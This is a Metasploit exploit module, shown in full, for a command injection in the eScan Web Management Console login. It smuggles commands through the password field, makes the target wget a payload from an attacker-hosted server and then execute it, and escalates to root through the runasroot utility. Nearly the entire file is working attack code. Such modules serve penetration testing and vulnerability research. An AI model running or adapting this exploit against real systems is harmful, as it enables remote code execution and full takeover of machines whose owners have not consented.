1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = ExcellentRanking
8

9
  include Msf::Exploit::Remote::HttpClient
10
  include Msf::Exploit::Remote::HttpServer::HTML
11
  include Msf::Exploit::EXE
12
  include Msf::Exploit::FileDropper
13

14
  def initialize(info = {})
15
    super(
16
      update_info(
17
        info,
18
        'Name' => 'eScan Web Management Console Command Injection',
19
        'Description' => %q{
20
          This module exploits a command injection vulnerability found in the eScan Web Management
21
          Console. The vulnerability exists while processing CheckPass login requests. An attacker
22
          with a valid username can use a malformed password to execute arbitrary commands. With
23
          mwconf privileges, the runasroot utility can be abused to get root privileges. This module
24
          has been tested successfully on eScan 5.5-2 on Ubuntu 12.04.
25
        },
26
        'License' => MSF_LICENSE,
27
        'Author' => [
28
          'Joxean Koret', # Vulnerability Discovery and PoC
29
          'juan vazquez' # Metasploit module
30
        ],
31
        'References' => [
32
          [ 'CVE', '2014-125118' ],
33
          [ 'URL', 'http://www.joxeankoret.com/download/breaking_av_software-pdf.tar.gz' ] # Syscan slides by Joxean
34
        ],
35
        'Payload' => {
36
          'BadChars' => '', # Real bad chars when injecting: "|&)(!><'\"` ", cause of it we're avoiding ARCH_CMD
37
          'DisableNops' => true
38
        },
39
        'Arch' => ARCH_X86,
40
        'Platform' => 'linux',
41
        'Privileged' => true,
42
        'Stance' => Msf::Exploit::Stance::Aggressive,
43
        'Targets' => [
44
          ['eScan 5.5-2 / Linux', {}],
45
        ],
46
        'DisclosureDate' => '2014-04-04',
47
        'DefaultTarget' => 0,
48
        'Notes' => {
49
          'Stability' => [CRASH_SAFE],
50
          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
51
          'Reliability' => [REPEATABLE_SESSION]
52
        }
53
      )
54
    )
55

56
    register_options(
57
      [
58
        Opt::RPORT(10080),
59
        OptString.new('USERNAME', [ true, 'A valid eScan username' ]),
60
        OptString.new('TARGETURI', [true, 'The base path to the eScan Web Administration console', '/']),
61
        OptString.new('EXTURL', [ false, 'An alternative host to request the EXE payload from' ]),
62
        OptInt.new('HTTPDELAY', [true, 'Time that the HTTP Server will wait for the payload request', 10]),
63
        OptString.new('WRITABLEDIR', [ true, 'A directory where we can write files', '/tmp' ]),
64
        OptString.new('RUNASROOT', [ true, 'Path to the runasroot binary', '/opt/MicroWorld/sbin/runasroot' ]),
65
      ]
66
    )
67
  end
68

69
  def check
70
    res = send_request_cgi({
71
      'method' => 'GET',
72
      'uri' => normalize_uri(target_uri.path.to_s, 'index.php')
73
    })
74

75
    if res && (res.code == 200) && res.body =~ (/eScan WebAdmin/)
76
      return Exploit::CheckCode::Detected
77
    end
78

79
    Exploit::CheckCode::Unknown
80
  end
81

82
  def cmd_exec(session, cmd)
83
    case session.type
84
    when /meterpreter/
85
      print_warning('Use a shell payload in order to get root!')
86
    when /shell/
87
      o = session.shell_command_token(cmd)
88
      o.chomp! if o
89
    end
90
    return '' if o.nil?
91

92
    return o
93
  end
94

95
  # Escalating privileges here because runasroot only can't be executed by
96
  # mwconf uid (196).
97
  def on_new_session(session)
98
    cmd_exec(session, "#{datastore['RUNASROOT'].shellescape} /bin/sh")
99
    super
100
  end
101

102
  def primer
103
    @payload_url = get_uri
104
    wget_payload
105
  end
106

107
  def on_request_uri(cli, request)
108
    print_status("Request: #{request.uri}")
109
    if request.uri =~ /#{Regexp.escape(get_resource)}/
110
      print_status('Sending payload...')
111
      send_response(cli, @pl)
112
    end
113
  end
114

115
  def autofilter
116
    true
117
  end
118

119
  def exploit
120
    @pl = generate_payload_exe
121

122
    @payload_url = ''
123

124
    if datastore['EXTURL'].blank?
125
      begin
126
        Timeout.timeout(datastore['HTTPDELAY']) { super }
127
      rescue Timeout::Error => e
128
        vprint_error(e.message)
129
      end
130
    else
131
      @payload_url = datastore['EXTURL']
132
      wget_payload
133
    end
134
    exec_payload
135
  end
136

137
  # we execute in this way, instead of an ARCH_CMD
138
  # payload because real badchars are: |&)(!><'"`[space]
139
  def wget_payload
140
    @dropped_elf = rand_text_alpha(rand(3..7))
141
    command = "wget${IFS}#{@payload_url}${IFS}-O${IFS}#{File.join(datastore['WRITABLEDIR'], @dropped_elf)}"
142

143
    print_status('Downloading the payload to the target machine...')
144
    res = exec_command(command)
145
    if res && res.code == 302 && res.headers['Location'] && res.headers['Location'] =~ /index\.php\?err_msg=password/
146
      register_files_for_cleanup(File.join(datastore['WRITABLEDIR'], @dropped_elf))
147
    else
148
      fail_with(Failure::Unknown, "#{peer} - Failed to download the payload to the target")
149
    end
150
  end
151

152
  def exec_payload
153
    command = "chmod${IFS}777${IFS}#{File.join(datastore['WRITABLEDIR'], @dropped_elf)};"
154
    command << File.join(datastore['WRITABLEDIR'], @dropped_elf)
155

156
    print_status('Executing the payload...')
157
    exec_command(command, 1)
158
  end
159

160
  def exec_command(command, timeout = 20)
161
    send_request_cgi({
162
      'method' => 'POST',
163
      'uri' => normalize_uri(target_uri.path.to_s, 'login.php'),
164
      'vars_post' => {
165
        'uname' => datastore['USERNAME'],
166
        'pass' => ";#{command}",
167
        'product_name' => 'escan',
168
        'language' => 'English',
169
        'login' => 'Login'
170
      }
171
    }, timeout)
172
  end
173
end
174

175